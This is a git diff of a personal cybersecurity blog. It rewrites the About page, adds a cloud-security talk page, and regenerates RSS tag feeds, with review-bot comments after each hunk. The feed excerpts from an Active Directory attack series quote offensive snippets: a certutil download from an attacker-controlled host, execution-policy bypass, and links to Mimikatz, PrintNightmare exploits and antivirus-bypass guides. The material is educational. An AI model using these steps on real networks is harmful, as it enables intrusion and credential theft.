diff --git a/content/_index.md b/content/_index.md
index ea4a23a..41d9e32 100644
--- a/content/_index.md
+++ b/content/_index.md
@@ -2,16 +2,19 @@
# 👋 Hello, World!
## I am Atharva Auti
-I am a final-year college student pursuing my **Bachelor of Engineering (B.E.)** in Cyber Security degree at **Mumbai University**. I am an enthusiastic Programmer and a Networking geek with experience working as a **Cybersecurity Researcher and Developer**.
+I am a passionate cybersecurity enthusiast currently pursuing a Master of Science in Cybersecurity Engineering at the [**University of Southern California**](mailto:auti@usc.edu). I hold a Bachelor of Engineering in Cybersecurity with Honors in AI & ML from Mumbai University. With a strong foundation in programming and networking, I have honed my skills through various research and development projects, including my tenure as a reverse engineer at VJTI’s Centre of Excellence in Complex Networks and Data Science, where I focused on ARM-based reverse engineering.
-I recently co-founded **CyHEX Infotech Private Limited**, a startup dedicated to providing development, products, and services that make a difference in the field of cybersecurity. We are constantly learning and staying up-to-date with the latest trends and technologies to provide our clients with the best possible solutions.
+In addition to my academic journey, I co-founded [**CyHEX Infotech Private Limited**](https://cyhex.co), a startup dedicated to advancing cybersecurity solutions through innovative development, products, and services. Our mission is to stay ahead of the curve by continuously learning and adapting to the latest trends and technologies, ensuring we provide our clients with cutting-edge solutions that make a real difference in the field of cybersecurity.
-For business queries and collaborations, drop an email to [contact@cyhex.co](mailto:contact@cyhex.co)
+My experience spans across different areas of cybersecurity, including threat intelligence, network security, and ethical hacking. I am committed to making a positive impact in the cybersecurity domain, leveraging my skills and experience to contribute to a safer digital world.
+
+For business queries and collaborations, drop an email to [auti@cyhex.co](mailto:auti@cyhex.co)
#### Wanna send a message?
[hi@auti.dev](mailto:hi@auti.dev)
-[auti@cyhex.co](mailto:auti@cyhex.co)
+[auti@cyhex.co](mailto:auti@cyhex.co)
+[auti@usc.edu](mailto:auti@usc.edu)
[PGP Key](../auti.pub)
[Discord (auti.dev)](https://discordapp.com/channels/@me/631478564411146262/)
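Review bot: In the rewritten intro paragraph the university name is linked to a mail address, `[**University of Southern California**](mailto:auti@usc.edu)`. A reader who clicks an institution name expects its website, so point the link at the university site or drop it; the address is already added to the "Wanna send a message?" list. The business-queries line also moves from the shared contact@cyhex.co to the personal auti@cyhex.co, which now appears twice on the page, so confirm that the shared mailbox is meant to be retired. The list sits next to the `[PGP Key](../auti.pub)` link, so check whether the published key should carry a user ID for the new usc.edu address.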
diff --git a/content/talk/cloudsec-basics.md b/content/talk/cloudsec-basics.md
new file mode 100644
index 0000000..8210714
--- /dev/null
+++ b/content/talk/cloudsec-basics.md
@@ -0,0 +1,20 @@
++++
+title = "Cloud Security Basics"
+date = "2024-06-15T12:00:00+05:30"
+
+ description = "Cloud Security Basics"
+
+tags = ["cloud", "cybersecurity", "blue-teaming"]
++++
+
+#### First seminar on 24th June 2024, as a seminar at Mumbai University
+
+[Presentation: docs.google.com](https://docs.google.com/presentation/d/1aYIKm7piiS-MUORRLOa0YzjamrX2eQZjI3YzL8b5gug/pub?start=false&loop=false)
+
+
+
+I had the honor of delivering a talk at SAKEC, **Mumbai University**, where I introduced the fundamental concepts of **cloud computing**. This session delved into the **core principles** of cloud architecture, service models, and deployment strategies, providing a comprehensive overview of how cloud technology is transforming the IT landscape. Through **practical examples** and **real-world scenarios**, I highlighted the **benefits of cloud adoption** and discussed the key considerations for securing cloud environments. This informative session aimed to equip the audience with the knowledge needed to navigate the evolving world of cloud computing and leverage its potential in their professional pursuits.
+
+### Credits
+
+I am sincerely grateful to [SAKEC Cybersecurity Department](https://www.sakec.ac.in/cyse/) for inviting me to speak during the Cloud Computing session. The encouragement and support were instrumental in allowing me to share key insights, contributing to a deeper understanding of cloud technology among the attendees.
\ No newline at end of file
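Review bot: The front matter date and the heading disagree. `date = "2024-06-15T12:00:00+05:30"` says 15 June, while the heading says "24th June 2024"; make them match, since the date drives ordering and the feed's pubDate. In the same block the `description` line has a leading space that the other keys lack, and its value only repeats the title, so a one-sentence summary would serve the feed better. The heading "First seminar on 24th June 2024, as a seminar at Mumbai University" says "seminar" twice, and the file has no trailing newline.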
diff --git a/public/blog/active-directory/index.xml b/public/blog/active-directory/index.xml
index 82c145d..af0d980 100644
--- a/public/blog/active-directory/index.xml
+++ b/public/blog/active-directory/index.xml
@@ -1,85 +1,48 @@
- active-directory on auti.dev ≽^._.^≼ ∫
+ Active-Directory on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/active-directory/
- Recent content in active-directory on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Active-Directory on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Fri, 20 Aug 2021 12:35:53 +0530
+ Fri, 20 Aug 2021 12:35:53 +0530
+
-
Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
-
https://auti.dev/useful-ad-resources/
- Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
-Mitm6: https://github.com/fox-it/mitm6
-Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-Mimikatz: https://github.com/gentilkiwi/mimikatz
-PRET: https://github.com/RUB-NDS/PRET
-Praeda: https://github.com/percx/Praeda
-SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
-LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
-cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
-calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
-Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
-Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
-mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
-Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
-Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
-A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
-Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
-GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
+ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
-
-
Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-4-post-exploitation/
- Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
-certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
-python -m SimpleHTTPServer [port] Browser
-Navigate directly to the file (%20 for spaces) FTP
-On Attacker Machine
-python -m pyftpdlib 21 On Victim Machine, Browse to
+ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to
-
-
Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!
-
-
Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
-
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
- Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Enumeration Load up a command prompt and cd into Downloads
-powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
-. .\Powerview.ps1 Fundamental Commands
-Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
+ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
-
-
Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
- Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
-Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
+ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
-
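Review bot: Every change in this hunk is generator churn rather than content. The term title goes from "active-directory" to "Active-Directory", the generator string from "Hugo -- gohugo.io" to "Hugo", and the item descriptions are re-emitted with identical text, which points to a different Hugo version having produced the build. If `public/` has to stay in the repository, pin the Hugo version used for builds and commit regenerated output separately from content edits so that reviews of `content/` are not buried under diffs like this one. Otherwise build it in CI and leave it out of the commit. Also confirm that the capitalised term title is wanted, since it changes what feed readers display.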
diff --git a/public/blog/blue-teaming/index.xml b/public/blog/blue-teaming/index.xml
index 19933c9..1cf2984 100644
--- a/public/blog/blue-teaming/index.xml
+++ b/public/blog/blue-teaming/index.xml
@@ -1,31 +1,27 @@
- blue-teaming on auti.dev ≽^._.^≼ ∫
+ Blue-Teaming on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/blue-teaming/
- Recent content in blue-teaming on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Blue-Teaming on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
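Review bot: The regenerated feed does not contain the talk added in this same change. `content/talk/cloudsec-basics.md` declares `tags = ["cloud", "cybersecurity", "blue-teaming"]`, yet the items here are still only "Demystifying Elastic SIEM" and "Leveraging Cybersecurity using ElasticSearch", and the channel date stays at Tue, 17 Oct 2023. Either the site was built before the new file was added, or the `tags` key is not the taxonomy that feeds `/blog/blue-teaming/`. Compare the front matter of an existing talk that does appear in this feed and use the same key, then rebuild.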
diff --git a/public/blog/cybersecurity/index.xml b/public/blog/cybersecurity/index.xml
index 007584a..37a90ea 100644
--- a/public/blog/cybersecurity/index.xml
+++ b/public/blog/cybersecurity/index.xml
@@ -1,124 +1,76 @@
- cybersecurity on auti.dev ≽^._.^≼ ∫
+ Cybersecurity on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/cybersecurity/
- Recent content in cybersecurity on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Cybersecurity on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
-
OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
-
https://auti.dev/owasp-top-10/
- First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
-I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
+ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
-
-
Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
-
https://auti.dev/useful-ad-resources/
- Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
-Mitm6: https://github.com/fox-it/mitm6
-Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-Mimikatz: https://github.com/gentilkiwi/mimikatz
-PRET: https://github.com/RUB-NDS/PRET
-Praeda: https://github.com/percx/Praeda
-SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
-LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
-cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
-calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
-Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
-Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
-mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
-Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
-Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
-A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
-Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
-GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
+ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
-
-
Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-4-post-exploitation/
- Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
-certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
-python -m SimpleHTTPServer [port] Browser
-Navigate directly to the file (%20 for spaces) FTP
-On Attacker Machine
-python -m pyftpdlib 21 On Victim Machine, Browse to
+ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to
-
-
Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!
-
-
Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
-
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
- Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Enumeration Load up a command prompt and cd into Downloads
-powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
-. .\Powerview.ps1 Fundamental Commands
-Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
+ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
-
-
Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
- Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
-Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
+ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
-
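Review bot: The item descriptions in this feed are auto-generated summaries that run the table of contents, headings and command lines together, for example "Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting ..." and the "Useful AD Resources" entry, which is a bare run of links. The new talk file sets an explicit `description`; doing the same in the front matter of these older posts would give subscribers a readable sentence per item instead of flattened page text.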
diff --git a/public/blog/elasticsearch/index.xml b/public/blog/elasticsearch/index.xml
index f2ad3fd..827f089 100644
--- a/public/blog/elasticsearch/index.xml
+++ b/public/blog/elasticsearch/index.xml
@@ -1,41 +1,34 @@
- elasticsearch on auti.dev ≽^._.^≼ ∫
+ Elasticsearch on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/elasticsearch/
- Recent content in elasticsearch on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Elasticsearch on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
